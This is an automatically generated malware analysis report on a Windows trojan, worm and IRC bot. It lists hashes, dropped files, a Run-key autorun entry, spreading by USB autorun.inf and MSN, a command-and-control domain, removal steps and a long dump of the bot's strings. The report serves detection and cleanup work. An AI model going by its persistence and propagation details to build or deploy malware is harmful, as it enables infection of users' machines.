HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Trojan.Heur.Rm3@s8dMvvpi (B) (Emsisoft), Gen:Trojan.Heur.Rm3@s8dMvvpi (AdAware), GenericMSNWorm.YR, GenericAutorunWorm.YR, GenericIRCBot.YR, GenericProxy.YR, Blazebot.YR (Lavasoft MAS)Behaviour: Trojan, Worm, WormAutorun, IRCBot, MSNWorm, Trojan-Proxy
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 61006bfd0b7715183d28c6fa4f261af3
SHA1: c2e4994f3418f8069d51b1e7f4994dd5af7d41c0
SHA256: 253688284eb161ad998c149ee0d53913db48aea6d96e9574f3c4d5b48cee9c48
SSDeep: 12288:ojMAk22rlFGYLQbblyMIZ06djABaL1UdGKMuUWCbYe2qD/2ms3:E92rSI 6pSaL13u4ke2cu3
Size: 705541 bytes
File type: broken
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualBasicv50v60
Company: no certificate found
Created at: 2011-08-04 19:47:18
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
| IRCBot | A bot can communicate with command and control servers via IRC channel. |
| MSNWorm | A worm can spread its copies through the MSN Messanger. |
| Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
Process activity
The Trojan creates the following process(es):
wuauclt.exe:1604
unpineapple.exe:740
system32.exe:1648
%original file name%.exe:848
The Trojan injects its code into the following process(es):No processes have been created.
File activity
The process wuauclt.exe:1604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
The process unpineapple.exe:740 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%.exe (4545 bytes)
The process %original file name%.exe:848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\unpineapple.exe (3766 bytes)
Registry activity
The process unpineapple.exe:740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F 55 19 7E B8 7A 30 5B 1E F7 A6 D2 3F FD 8E 66"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows Data Serivce" = "system32.exe"
The process system32.exe:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 1F 0D 3B A0 A4 8E 61 D2 CD F5 43 53 EC 09 97"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process %original file name%.exe:848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 03 8F 0B 95 5F CC 60 CB 53 AC 78 A8 1E 96 D3"
Dropped PE files
| MD5 | File path |
|---|---|
| 97244e651162527d16e471a02dcf8e63 | c:\WINDOWS\system32.exe |
| 97244e651162527d16e471a02dcf8e63 | c:\unpineapple.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.A worm can spread its copies through the MSN Messanger.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
wuauclt.exe:1604
unpineapple.exe:740
system32.exe:1648
%original file name%.exe:848 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
%System%.exe (4545 bytes)
C:\unpineapple.exe (3766 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows Data Serivce" = "system32.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
Static Analysis
VersionInfo
Company Name: Microsoft
Product Name: Project1
Product Version: 1.00
Legal Copyright:
Legal Trademarks:
Original Filename: mine.exe
Internal Name: mine
File Version: 1.00
File Description:
Comments:
Language: English (United States)
Company Name: MicrosoftProduct Name: Project1Product Version: 1.00Legal Copyright: Legal Trademarks: Original Filename: mine.exeInternal Name: mineFile Version: 1.00File Description: Comments: Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 2584 | 4096 | 2.05715 | fbd20cf3478af8c24f868723823fc84b |
| .data | 8192 | 712 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 12288 | 2248 | 4096 | 1.30488 | 91e7fb470e9302bfdbc8e172ca8db596 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| idk.freprn.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
Strings from Dumps
system32.exe_1648:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
PSSh]
PSSh]
t1SSSSh
t1SSSSh
SSShx
SSShx
PSSh*t@
PSSh*t@
3|$43|$$
3|$43|$$
3|$<3|$$
3|$<3|$$
3|$(3|$,
3|$(3|$,
.EOWSU
.EOWSU
msn.msg
msn.msg
msn.stop
msn.stop
login
login
firefox
firefox
join
join
Big Number part of OpenSSL 0.9.8j 07 Jan 2009
Big Number part of OpenSSL 0.9.8j 07 Jan 2009
SHA1 part of OpenSSL 0.9.8j 07 Jan 2009
SHA1 part of OpenSSL 0.9.8j 07 Jan 2009
MD5 part of OpenSSL 0.9.8j 07 Jan 2009
MD5 part of OpenSSL 0.9.8j 07 Jan 2009
RSA part of OpenSSL 0.9.8j 07 Jan 2009
RSA part of OpenSSL 0.9.8j 07 Jan 2009
DSA part of OpenSSL 0.9.8j 07 Jan 2009
DSA part of OpenSSL 0.9.8j 07 Jan 2009
len>=0 && len<=(int)sizeof(ctx->key)
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
EVP part of OpenSSL 0.9.8j 07 Jan 2009
EVP part of OpenSSL 0.9.8j 07 Jan 2009
CERTIFICATE REQUEST
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
CERTIFICATE
RSA PRIVATE KEY
RSA PRIVATE KEY
DSA PRIVATE KEY
DSA PRIVATE KEY
EC PRIVATE KEY
EC PRIVATE KEY
RAND part of OpenSSL 0.9.8j 07 Jan 2009
RAND part of OpenSSL 0.9.8j 07 Jan 2009
You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html
You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html
%s(%d): OpenSSL internal error, assertion failed: %s
%s(%d): OpenSSL internal error, assertion failed: %s
Diffie-Hellman part of OpenSSL 0.9.8j 07 Jan 2009
Diffie-Hellman part of OpenSSL 0.9.8j 07 Jan 2009
SHA-256 part of OpenSSL 0.9.8j 07 Jan 2009
SHA-256 part of OpenSSL 0.9.8j 07 Jan 2009
SHA-512 part of OpenSSL 0.9.8j 07 Jan 2009
SHA-512 part of OpenSSL 0.9.8j 07 Jan 2009
DlRIPE-MD160 part of OpenSSL 0.9.8j 07 Jan 2009
DlRIPE-MD160 part of OpenSSL 0.9.8j 07 Jan 2009
CAST part of OpenSSL 0.9.8j 07 Jan 2009
CAST part of OpenSSL 0.9.8j 07 Jan 2009
RC4 part of OpenSSL 0.9.8j 07 Jan 2009
RC4 part of OpenSSL 0.9.8j 07 Jan 2009
Blowfish part of OpenSSL 0.9.8j 07 Jan 2009
Blowfish part of OpenSSL 0.9.8j 07 Jan 2009
Microsoft Local Key set
Microsoft Local Key set
LocalKeySet
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
password based MAC
id-PasswordBasedMAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
X509v3 Certificate Issuer
certificateIssuer
certificateIssuer
certicom-arc
certicom-arc
Proxy Certificate Information
Proxy Certificate Information
proxyCertInfo
proxyCertInfo
Microsoft Smartcardlogin
Microsoft Smartcardlogin
msSmartcardLogin
msSmartcardLogin
joint-iso-itu-t
joint-iso-itu-t
JOINT-ISO-ITU-T
JOINT-ISO-ITU-T
set-rootKeyThumb
set-rootKeyThumb
setAttr-Cert
setAttr-Cert
setCext-cCertRequired
setCext-cCertRequired
setCext-certType
setCext-certType
setct-CertResTBE
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBEX
setct-CertReqTBE
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertInqReqTBS
setct-CertResData
setct-CertResData
setct-CertReqTBS
setct-CertReqTBS
setct-CertReqData
setct-CertReqData
setct-PCertResTBS
setct-PCertResTBS
setct-PCertReqData
setct-PCertReqData
setct-AcqCardCodeMsg
setct-AcqCardCodeMsg
certificate extensions
certificate extensions
set-certExt
set-certExt
set-msgExt
set-msgExt
id-ecPublicKey
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-cmc-getCert
id-regInfo-certReq
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-ct-publishCert
id-smime-mod-msg-v3
id-smime-mod-msg-v3
sdsiCertificate
sdsiCertificate
x509Certificate
x509Certificate
localKeyID
localKeyID
certBag
certBag
pkcs8ShroudedKeyBag
pkcs8ShroudedKeyBag
keyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Client Authentication
TLS Web Server Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
X509v3 Extended Key Usage
extendedKeyUsage
extendedKeyUsage
X509v3 Authority Key Identifier
X509v3 Authority Key Identifier
authorityKeyIdentifier
authorityKeyIdentifier
X509v3 Certificate Policies
X509v3 Certificate Policies
certificatePolicies
certificatePolicies
X509v3 Private Key Usage Period
X509v3 Private Key Usage Period
privateKeyUsagePeriod
privateKeyUsagePeriod
X509v3 Key Usage
X509v3 Key Usage
keyUsage
keyUsage
X509v3 Subject Key Identifier
X509v3 Subject Key Identifier
subjectKeyIdentifier
subjectKeyIdentifier
Netscape Certificate Sequence
Netscape Certificate Sequence
nsCertSequence
nsCertSequence
Netscape CA Policy Url
Netscape CA Policy Url
nsCaPolicyUrl
nsCaPolicyUrl
Netscape Renewal Url
Netscape Renewal Url
nsRenewalUrl
nsRenewalUrl
Netscape CA Revocation Url
Netscape CA Revocation Url
nsCaRevocationUrl
nsCaRevocationUrl
Netscape Revocation Url
Netscape Revocation Url
nsRevocationUrl
nsRevocationUrl
Netscape Base Url
Netscape Base Url
nsBaseUrl
nsBaseUrl
Netscape Cert Type
Netscape Cert Type
nsCertType
nsCertType
Netscape Certificate Extension
Netscape Certificate Extension
nsCertExt
nsCertExt
extendedCertificateAttributes
extendedCertificateAttributes
challengePassword
challengePassword
dhKeyAgreement
dhKeyAgreement
pubkey
pubkey
PEM part of OpenSSL 0.9.8j 07 Jan 2009
PEM part of OpenSSL 0.9.8j 07 Jan 2009
phrase is too short, needs to be at least %d chars
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
Enter PEM pass phrase:
TRUSTED CERTIFICATE
TRUSTED CERTIFICATE
X509 CERTIFICATE
X509 CERTIFICATE
PRIVATE KEY
PRIVATE KEY
ANY PRIVATE KEY
ANY PRIVATE KEY
ENCRYPTED PRIVATE KEY
ENCRYPTED PRIVATE KEY
enc_key
enc_key
key_enc_algor
key_enc_algor
cert
cert
d.encrypted
d.encrypted
d.digest
d.digest
d.signed_and_enveloped
d.signed_and_enveloped
d.enveloped
d.enveloped
d.sign
d.sign
d.data
d.data
d.other
d.other
NETSCAPE_CERT_SEQUENCE
NETSCAPE_CERT_SEQUENCE
certs
certs
.\crypto\pem\pem_pkey.c
.\crypto\pem\pem_pkey.c
X509_PUBKEY
X509_PUBKEY
public_key
public_key
priv_key
priv_key
pub_key
pub_key
.\crypto\ec\ec_key.c
.\crypto\ec\ec_key.c
EC_PRIVATEKEY
EC_PRIVATEKEY
publicKey
publicKey
privateKey
privateKey
value.implicitlyCA
value.implicitlyCA
value.parameters
value.parameters
value.named_curve
value.named_curve
p.char_two
p.char_two
p.prime
p.prime
p.ppBasis
p.ppBasis
p.tpBasis
p.tpBasis
p.onBasis
p.onBasis
p.other
p.other
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
USER32.DLL
USER32.DLL
NETAPI32.DLL
NETAPI32.DLL
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.DLL
ADVAPI32.DLL
lhash part of OpenSSL 0.9.8j 07 Jan 2009
lhash part of OpenSSL 0.9.8j 07 Jan 2009
Stack part of OpenSSL 0.9.8j 07 Jan 2009
Stack part of OpenSSL 0.9.8j 07 Jan 2009
.\crypto\dh\dh_key.c
.\crypto\dh\dh_key.c
ASN.1 part of OpenSSL 0.9.8j 07 Jan 2009
ASN.1 part of OpenSSL 0.9.8j 07 Jan 2009
value.single
value.single
value.set
value.set
.\crypto\evp\evp_key.c
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
nkey <= EVP_MAX_KEY_LENGTH
cert_info
cert_info
EC part of OpenSSL 0.9.8j 07 Jan 2009
EC part of OpenSSL 0.9.8j 07 Jan 2009
ECDSA part of OpenSSL 0.9.8j 07 Jan 2009
ECDSA part of OpenSSL 0.9.8j 07 Jan 2009
PKCS8_PRIV_KEY_INFO
PKCS8_PRIV_KEY_INFO
pkey
pkey
pkeyalg
pkeyalg
.\crypto\evp\evp_pkey.c
.\crypto\evp\evp_pkey.c
keylen <= sizeof key
keylen <= sizeof key
.\crypto\pkcs12\p12_key.c
.\crypto\pkcs12\p12_key.c
RC2 part of OpenSSL 0.9.8j 07 Jan 2009
RC2 part of OpenSSL 0.9.8j 07 Jan 2009
IDEA part of OpenSSL 0.9.8j 07 Jan 2009
IDEA part of OpenSSL 0.9.8j 07 Jan 2009
AUTHORITY_KEYID
AUTHORITY_KEYID
keyid
keyid
X509_CERT_PAIR
X509_CERT_PAIR
X509_CERT_AUX
X509_CERT_AUX
keylength
keylength
keyfunc
keyfunc
MD2 part of OpenSSL 0.9.8j 07 Jan 2009
MD2 part of OpenSSL 0.9.8j 07 Jan 2009
%'%1%=%C%K%O%s%
%'%1%=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
C%C'C3C7C9COCWCiC
Verifying - %s
Verifying - %s
%lu:%s:%s:%d:%s
%lu:%s:%s:%d:%s
error:lX:%s:%s:%s
error:lX:%s:%s:%s
d.usernotice
d.usernotice
d.cpsuri
d.cpsuri
CERTIFICATEPOLICIES
CERTIFICATEPOLICIES
%*sCPS: %s
%*sCPS: %s
%*sExplicit Text: %s
%*sExplicit Text: %s
%*sNumber%s:
%*sNumber%s:
%*sOrganization: %s
%*sOrganization: %s
d.registeredID
d.registeredID
d.iPAddress
d.iPAddress
d.uniformResourceIdentifier
d.uniformResourceIdentifier
d.ediPartyName
d.ediPartyName
d.directoryName
d.directoryName
d.dNSName
d.dNSName
d.rfc822Name
d.rfc822Name
d.otherName
d.otherName
value.bag
value.bag
value.safes
value.safes
value.shkeybag
value.shkeybag
value.keybag
value.keybag
value.sdsicert
value.sdsicert
value.x509cert
value.x509cert
value.other
value.other
'() ,-./:=?
'() ,-./:=?
CONF part of OpenSSL 0.9.8j 07 Jan 2009
CONF part of OpenSSL 0.9.8j 07 Jan 2009
%d.%d.%d.%d/%d.%d.%d.%d
%d.%d.%d.%d/%d.%d.%d.%d
%*s%s:
%*s%s:
%*sPolicy Text: %s
%*sPolicy Text: %s
%*scrlUrl:
%*scrlUrl:
EXTENDED_KEY_USAGE
EXTENDED_KEY_USAGE
%*sZone: %s, User:
%*sZone: %s, User:
certificateHold
certificateHold
Certificate Hold
Certificate Hold
cessationOfOperation
cessationOfOperation
Cessation Of Operation
Cessation Of Operation
keyCompromise
keyCompromise
Key Compromise
Key Compromise
name.relativename
name.relativename
name.fullname
name.fullname
<UNSUPPORTED></UNSUPPORTED>
<UNSUPPORTED></UNSUPPORTED>
.\crypto\x509v3\v3_akey.c
.\crypto\x509v3\v3_akey.c
<unsupported></unsupported>
<unsupported></unsupported>
IP Address:%d.%d.%d.%d
IP Address:%d.%d.%d.%d
URI:%s
URI:%s
DNS:%s
DNS:%s
email:%s
email:%s
EdiPartyName:<unsupported></unsupported>
EdiPartyName:<unsupported></unsupported>
X400Name:<unsupported></unsupported>
X400Name:<unsupported></unsupported>
othername:<unsupported></unsupported>
othername:<unsupported></unsupported>
PKEY_USAGE_PERIOD
PKEY_USAGE_PERIOD
keyCertSign
keyCertSign
Certificate Sign
Certificate Sign
keyAgreement
keyAgreement
Key Agreement
Key Agreement
keyEncipherment
keyEncipherment
Key Encipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
.\crypto\x509v3\v3_skey.c
CONF_def part of OpenSSL 0.9.8j 07 Jan 2009
CONF_def part of OpenSSL 0.9.8j 07 Jan 2009
[[%s]]
[[%s]]
[%s] %s=%s
[%s] %s=%s
PROXY_CERT_INFO_EXTENSION
PROXY_CERT_INFO_EXTENSION
crlUrl
crlUrl
certStatus
certStatus
certId
certId
OCSP_CERTSTATUS
OCSP_CERTSTATUS
value.unknown
value.unknown
value.revoked
value.revoked
value.good
value.good
value.byKey
value.byKey
value.byName
value.byName
reqCert
reqCert
OCSP_CERTID
OCSP_CERTID
issuerKeyHash
issuerKeyHash
%s - d:d:d %d%s
%s - d:d:d %d%s
\X
\X
- %-15s
- %-15s
%s.dll
%s.dll
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
1.2.3
1.2.3
inflate 1.2.3 Copyright 1995-2005 Mark Adler
inflate 1.2.3 Copyright 1995-2005 Mark Adler
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
GetWindowsDirectoryA
GetWindowsDirectoryA
VkKeyScanA
VkKeyScanA
keybd_event
keybd_event
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
USERENV.dll
USERENV.dll
WS2_32.dll
WS2_32.dll
GetCPInfo
GetCPInfo
GetProcessWindowStation
GetProcessWindowStation
DI32.dll
DI32.dll
ReportEventA
ReportEventA
reptile.exe
reptile.exe
libssh2_banner_set
libssh2_banner_set
libssh2_base64_decode
libssh2_base64_decode
libssh2_channel_close
libssh2_channel_close
libssh2_channel_direct_tcpip_ex
libssh2_channel_direct_tcpip_ex
libssh2_channel_eof
libssh2_channel_eof
libssh2_channel_flush_ex
libssh2_channel_flush_ex
libssh2_channel_forward_accept
libssh2_channel_forward_accept
libssh2_channel_forward_cancel
libssh2_channel_forward_cancel
libssh2_channel_forward_listen_ex
libssh2_channel_forward_listen_ex
libssh2_channel_free
libssh2_channel_free
libssh2_channel_get_exit_status
libssh2_channel_get_exit_status
libssh2_channel_handle_extended_data
libssh2_channel_handle_extended_data
libssh2_channel_handle_extended_data2
libssh2_channel_handle_extended_data2
libssh2_channel_open_ex
libssh2_channel_open_ex
libssh2_channel_process_startup
libssh2_channel_process_startup
libssh2_channel_read_ex
libssh2_channel_read_ex
libssh2_channel_receive_window_adjust
libssh2_channel_receive_window_adjust
libssh2_channel_request_pty_ex
libssh2_channel_request_pty_ex
libssh2_channel_request_pty_size_ex
libssh2_channel_request_pty_size_ex
libssh2_channel_send_eof
libssh2_channel_send_eof
libssh2_channel_set_blocking
libssh2_channel_set_blocking
libssh2_channel_setenv_ex
libssh2_channel_setenv_ex
libssh2_channel_wait_closed
libssh2_channel_wait_closed
libssh2_channel_wait_eof
libssh2_channel_wait_eof
libssh2_channel_window_read_ex
libssh2_channel_window_read_ex
libssh2_channel_window_write_ex
libssh2_channel_window_write_ex
libssh2_channel_write_ex
libssh2_channel_write_ex
libssh2_channel_x11_req_ex
libssh2_channel_x11_req_ex
libssh2_hostkey_hash
libssh2_hostkey_hash
libssh2_poll
libssh2_poll
libssh2_poll_channel_read
libssh2_poll_channel_read
libssh2_session_abstract
libssh2_session_abstract
libssh2_session_block_directions
libssh2_session_block_directions
libssh2_session_callback_set
libssh2_session_callback_set
libssh2_session_disconnect_ex
libssh2_session_disconnect_ex
libssh2_session_flag
libssh2_session_flag
libssh2_session_free
libssh2_session_free
libssh2_session_get_blocking
libssh2_session_get_blocking
libssh2_session_init_ex
libssh2_session_init_ex
libssh2_session_last_errno
libssh2_session_last_errno
libssh2_session_last_error
libssh2_session_last_error
libssh2_session_method_pref
libssh2_session_method_pref
libssh2_session_methods
libssh2_session_methods
libssh2_session_set_blocking
libssh2_session_set_blocking
libssh2_session_startup
libssh2_session_startup
libssh2_trace
libssh2_trace
libssh2_userauth_authenticated
libssh2_userauth_authenticated
libssh2_userauth_hostbased_fromfile_ex
libssh2_userauth_hostbased_fromfile_ex
libssh2_userauth_keyboard_interactive_ex
libssh2_userauth_keyboard_interactive_ex
libssh2_userauth_list
libssh2_userauth_list
libssh2_userauth_password_ex
libssh2_userauth_password_ex
libssh2_userauth_publickey_fromfile_ex
libssh2_userauth_publickey_fromfile_ex
sshspreadscan
sshspreadscan
sshgodscan
sshgodscan
sshadminscan
sshadminscan
ntpass
ntpass
Exploit FTPD: %d, Total: %d.
Exploit FTPD: %d, Total: %d.
%s: %d,
%s: %d,
%s Exploit Statistics:
%s Exploit Statistics:
%s.%s.%s.%s
%s.%s.%s.%s
%s Scan not active.
%s Scan not active.
%s Current IP: %s.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s out.
%s already running: <%d>.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Bot installed on: %s.
Go fuck yourself %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
MSN// Message & Zipfile sent to: %d contacts.
I tried to fool %d morons.
I tried to fool %d morons.
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Removed by: %s!%s@%s
Advapi.dll Failed
Advapi.dll Failed
PStore.dll Failed.
PStore.dll Failed.
%s Failed to parse command.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s Failed to start scan thread, error: <%d>.
